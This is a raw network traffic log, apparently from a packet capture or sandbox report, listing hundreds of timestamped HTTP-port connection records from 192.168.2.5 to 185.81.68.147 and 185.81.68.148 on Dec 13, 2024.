                                                                                                                                                                Dec 13, 2024 01:37:36.220251083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220268011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220298052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220312119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220340967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220355988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220555067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220570087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220613003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220627069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220654011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220666885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220695019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220710039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220735073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220752001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220777035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220791101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220905066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.220907927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.220933914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221251965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221278906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221290112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221353054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221368074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221394062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221467018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221467018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221487045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221503973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221532106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221545935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221570015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221765041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221801043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221817017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221847057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221862078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221884966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221899986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221926928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221941948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221966028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.221981049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222008944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222131968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222156048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222222090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222253084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222270966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222349882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222385883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222408056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222476006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222512007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222543955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222568035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222582102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222609997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222788095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222817898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222834110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222861052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222875118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222903013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222915888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222940922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222955942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.222980976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223001957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223026037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223129034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223146915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223170042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223257065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223274946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223332882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223370075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223393917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223411083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223707914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223761082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223762035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223795891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223819017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223866940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223866940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223920107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.223973989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224025011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224050999 CET4978080192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:36.224054098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224400043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224622011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224636078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224668026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224682093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224709988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224724054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224750042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224770069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224793911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224807024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224836111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224858999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224880934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.224981070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225008011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225029945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225055933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225120068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225143909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225157976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225241899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225255966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225292921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225353003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225375891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225399971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225425005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225440025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225466967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225636959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225671053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225684881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225716114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225729942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225756884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225769043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225796938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225811005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225841045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225857019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225882053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225963116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.225991011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226011038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226039886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226106882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226130009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226145029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226228952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226264000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226280928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226355076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226388931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226411104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226434946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226455927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226478100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226630926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226654053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226677895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226696014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226717949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226742029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226752996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226780891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226794004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226819038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226834059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226864100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226877928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226970911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.226994991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227013111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227039099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227102041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227124929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227145910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227219105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227255106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227308989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227341890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227355957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227379084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227392912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227421045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227433920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227463007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227615118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227638960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227663994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227680922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227701902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227725029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227741003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227763891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227781057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227811098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227821112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227850914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227864981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227890015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.227976084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228002071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228018999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228043079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228105068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228122950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228144884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228210926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228235960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228251934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228316069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228329897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228358030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228374004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228398085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228415012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228437901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228590965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228616953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228631020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228656054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228668928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228701115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228713989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228739977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228750944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228777885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228791952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228818893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228832006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228859901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228949070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228971958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.228986025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229012966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229073048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229109049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229132891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229208946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229248047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229305983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229327917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229348898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229374886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229387999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229413986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.229429960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232283115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232283115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232299089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232322931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232343912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232357025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232383966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232409000 CET4978180192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:36.232419968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232559919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232603073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232616901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232642889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232665062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232719898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232764959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232780933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232830048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.232873917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233161926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233236074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233263016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233280897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233366966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233402967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233417034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233442068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233457088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233486891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233503103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233710051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233724117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233752966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233767986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233795881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233809948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233835936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233848095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233875036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233890057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233913898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233927965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233952045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233968019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.233997107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234093904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234117985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234134912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234160900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234222889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234245062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234261036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234287977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234347105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234369993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234384060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234411955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.234472036 CET4977580192.168.2.5185.81.68.147
